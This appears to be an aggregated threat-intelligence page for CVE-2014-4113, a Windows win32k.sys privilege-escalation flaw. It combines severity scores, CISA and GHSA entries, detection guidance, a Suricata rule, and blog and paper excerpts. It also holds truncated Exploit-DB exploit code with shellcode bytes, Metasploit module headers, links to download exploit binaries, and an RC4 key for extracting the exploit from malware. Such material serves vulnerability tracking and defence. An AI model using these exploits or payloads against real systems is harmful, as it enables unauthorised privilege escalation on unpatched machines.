CVE-2014-4113
Published: 2014-10-15
CVSS 3.1: 7.8 (High)
CISA Known Exploited Vulnerability, remediation due 2022-05-25
Exploited in the wild
EPSS: 87.04% (99.7th percentile)
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCs (extracted from sources)
Byte pattern:
\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60
Detection guidance:
- Detect NTFS Alternate Data Stream (ADS) creation at C:\Windows\Temp:1, used to hide the Native Application binary from standard file browsers.
- Monitor for modifications to the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SetupExecute and BootExecute registry values, which the malware alters to persist a Native Application across reboots.
- Alert on creation of rdpinst.exe and its registration under \Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce as a persistence indicator for the final payload.
- Detect use of the low-level syscall stubs INT 2Eh and CALL ntdll!KiFastSystemCall in user-mode processes, used to bypass AV/sandbox user-space hooks.
- Detect removal of filter driver registry entries prior to reboot, a technique used to disable AV drivers before the Native Application executes during boot.
- Detect the TrackPopupMenu-based win32k.sys exploitation pattern: a WH_CALLWNDPROC hook combined with TrackPopupMenu calls, as used in the CVE-2014-4113 PoC exploit targeting Windows 8.0–8.1 x64.
- Flag processes spawning cmd.exe /c reg.exe for registry modification, as the malware uses this indirection to distance itself from direct malicious registry writes.
Analysis notes:
- The malware contains extensive anti-sandbox and anti-AV checks; it terminates prematurely and re-encrypts its .data section if it detects a sandbox, VM, or specific AV products, so sandbox-only analysis will miss its full functionality.
- The malware checks for two hard-coded MAC addresses and terminates if the host matches either, limiting detonation on certain analysis machines.
- The exploit for CVE-2014-4113 is embedded as a 64-bit executable inside a nested encrypted/compressed blob (Matryoshka structure); static extraction requires RC4 decryption with the key 'dqrChZonUF' followed by aPLib decompression.
- Swapping the shellcode in the EDB-37064 PoC for a bind or reverse shell will cause a BSOD; the embedded shellcode only safely executes cmd.exe.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.8 | HIGH | — |
| cisa | — | 7.8 | HIGH | — |
CISA
Microsoft Win32k Privilege Escalation Vulnerability
cisa · 2022-05-04 · CVSS 7.8 · HIGH · CWE-264
Affected: Microsoft Win32k
Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-4113
Remediation Due Date: 2022-05-25
GHSA
GHSA-wjjh-xg7v-8wf9: win32k
ghsa_unreviewed · 2022-05-14 · HIGH
win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck · 2014 · CVSS 7.8 · HIGH · CWE-264
Microsoft Win32k contains an unspecified vulnerability that allows for privilege escalation.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/; https://www.cve.org/CVERecord?id=CVE-2014-4113; https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf; https://cyberwarzone.com/wp-content/uploads/2019/02/ReportGlobalThreatIntelligence.pdf; https://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hur
Suricata
ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC
suricata · 2014-10-15 · CVSS 7.8 · HIGH
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible CVE-2014-4113 Exploit Download with Hurricane Panda IOC"; flow:established,to_client; flowbits:isset,ET.http.binary; file.data; content:"woqunimalegebi"; fast_pattern; reference:url,blog.crowdstrike.com/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/; reference:cve,2014-4113; classtype:attempted-user; sid:2019421; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2014_10_15, cve CVE_2014_4113, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, tag CISA_KEV, update
Exploit-DB
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit)
exploitdb · 2018-10-08 · listed under CVE-2016-3225
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/windows/reflective_dll_injection'
class MetasploitModule 'Windows Net-NTLMv2 Reflection DCOM/RPC',
'Description' => %q(
Module utilizes the Net-NTLMv2 reflection between DCOM/RPC
to achieve a SYSTEM handle for elevation of privilege. Currently the module
does not spawn as SYSTEM, however once achieving a shell, one can easily
use incognito to impersonate the token.
),
'License' => MSF_LICENSE,
'Author' =>
[
'FoxGloveSec', # the original Potato exploit
'breenmachine', # Rotten Potato NG!
'Mumbai' # Austin : port of RottenPotato for reflection & quick module
],
'
Exploit-DB
Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
exploitdb · 2016-04-05 · CVSS 7.8 · HIGH
---
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
Exploit-DB
Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
exploitdb · 2015-05-19 · CVSS 7.8 · HIGH
---
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
# CVE-2014-4113 Privilege Escalation
# http://www.offensive-security.com
# Thx to Moritz Jodeit for the beautiful writeup
# http://www.exploit-db.com/docs/35152.pdf
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal
ULONG_PTR = PVOID = LPVOID
HCURSOR = HICON
PDWORD = POINTER(DWORD)
PQWORD = POINTER(LPVOID)
LRESULT = LPVOID
UCHAR = c_ubyte
QWORD = c_ulonglong
CHAR = c_char
NTSTATUS = DWORD
MIIM_STRING = 0x
Exploit-DB
Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
exploitdb · 2014-11-24
---
#include "hd.h"
// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar
byte __s_code[]={
0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6
Exploit-DB
Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
exploitdb · 2014-10-28
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
can be triggered through the use of TrackPopupMenu. Under special conditions, the
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
code execution. This module has been tested successfully on Windows XP SP3, Windows
2003 SP2, Windows 7 SP1 and Windows 2008 32bi
Metasploit
Windows TrackPopupMenu Win32k NULL Pointer Dereference
metasploit
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
DFIR Report
Inside the Open Directory of the “You Dun” Threat Group
blogs_dfir_report · 2024-10-28
Bleepingcomputer
Privilege elevation exploits used in over 50% of insider attacks
blogs_bleepingcomputer · 2023-12-08
By Bill Toulas
Elevation of privilege flaws are the most common vulnerability leveraged by corporate insiders when conducting unauthorized activities on networks, whether for malicious purposes or by downloading risky tools in a dangerous manner.
A report by Crowdstrike based on data gathered between January 2021 and April 2023 shows that insider threats are on the rise and that using privilege escalation flaws is a significant component of unauthorized activity.
According to the report, 55% of insider threats logged by the company rely on privilege escalation exploits, while the remaining 45% unwittingly introduce risks by downloading or misusing offensive tools.
Rogue insiders typically turn against their employer b
Checkpoint
Exploit Developer Spotlight: The Story of PlayBit
blogs_checkpoint · 2020-10-26 · CVSS 7.8 · HIGH · listed under CVE-2018-8453
Research By: Eyal Itkin and Itay Cohen
## Introduction
Exploits have always been an important and integral part of malicious attacks.
Sentinelone
Malware Discovered - SFG: Furtim Malware Analysis
blogs_sentinelone · 2016-07-12
By Joseph Landry and Udi Shamir
Update, 14-July: There have been a number of stories published since the posting of this blog that have suggested this attack is specifically targeting SCADA energy management systems. We want to emphasize that we do not have any evidence that this is in fact the case. The focus of our analysis was on the characteristics of the malware, not the attribution or target.
The Labs team at SentinelOne recently discovered a sophisticated malware campaign specifically targeting at least one energy company. Upon discovery, the team reverse engineered the code and believes that based on the nature, behavior and sophistication of the malware and the extreme measures it takes to evade detection, it likely points to a nation-state sponsored initiative, potentially
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42 · 2014-10-15 · CVSS 7.8 · HIGH
Ryan Olson, published October 15, 2014
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos · 2014-10-14 · CVSS 7.8 · HIGH
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is MS14-056 and is the IE bulletin. There’s a total of 14 CVEs and it is rated
Crowdstrike
CrowdStrike Discovers Use of 64-bit Exploit by Hurricane Panda
blogs_crowdstrike
Crowdstrike
How Insiders Use Vulnerabilities Against Organizations
blogs_crowdstrike
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Almuthanna Alageel and Sergio Maffeis
Department of Computing, Imperial College London, London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
References
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/
- http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspx
- http://osvdb.org/show/osvdb/113167
- http://packetstormsecurity.com/files/131964/Windows-8.0-8.1-x64-TrackPopupMenu-Privilege-Escalation.html
- http://secunia.com/advisories/60970
- http://www.exploit-db.com/exploits/35101
- http://www.securityfocus.com/bid/70364
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-058
- https://github.com/sam-b/CVE-2014-4113
- https://www.exploit-db.com/exploits/37064/
- https://www.exploit-db.com/exploits/39666/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-4113
Timeline
- 2014-10-15: Published
- 2022-05-04: Added to CISA KEV
- Exploited in the wild